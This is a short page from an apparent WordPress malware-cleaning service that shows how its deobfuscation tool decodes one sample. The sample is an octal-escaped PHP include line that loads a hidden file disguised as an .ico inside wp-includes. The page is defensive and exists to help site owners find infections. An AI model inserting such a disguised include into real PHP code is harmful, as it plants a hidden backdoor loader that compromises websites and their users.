Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php @include "\057var/\167ww/a\157moru\056ga/w\145b/wp\055incl\165des/\142lock\163/aud\151o/.c\06140b3\0702.ic\157";...



Obfuscated php code

<?php @include "\057var/\167ww/a\157moru\056ga/w\145b/wp\055incl\165des/\142lock\163/aud\151o/.c\06140b3\0702.ic\157";

Decoded(de-Obfuscated) php code

<?php

@(include "/var/www/aomoru.ga/web/wp-includes/blocks/audio/.c140b382.ico");


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.